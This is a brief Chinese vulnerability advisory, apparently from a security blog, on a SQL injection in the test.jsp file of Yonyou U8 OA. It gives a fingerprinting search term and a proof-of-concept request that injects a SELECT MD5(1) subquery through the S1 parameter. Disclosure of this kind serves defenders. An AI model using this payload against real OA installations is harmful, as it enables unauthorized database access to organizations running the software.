用友 U8 OA test.jsp SQL注入漏洞

漏洞描述

用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。

漏洞影响

用友 U8 OA

网络测绘

“用友U8-OA”

漏洞复现

登录页面如下

20231206102102105-1645976459870-e87ed43e-2b7e-432d-b0ca-4909d02748be.66f3e232_2023-12-06_10-20-39 (1)

验证POC

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

20231206102415949-yongyou-12.077dfb08_2023-12-06_10-24-01 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容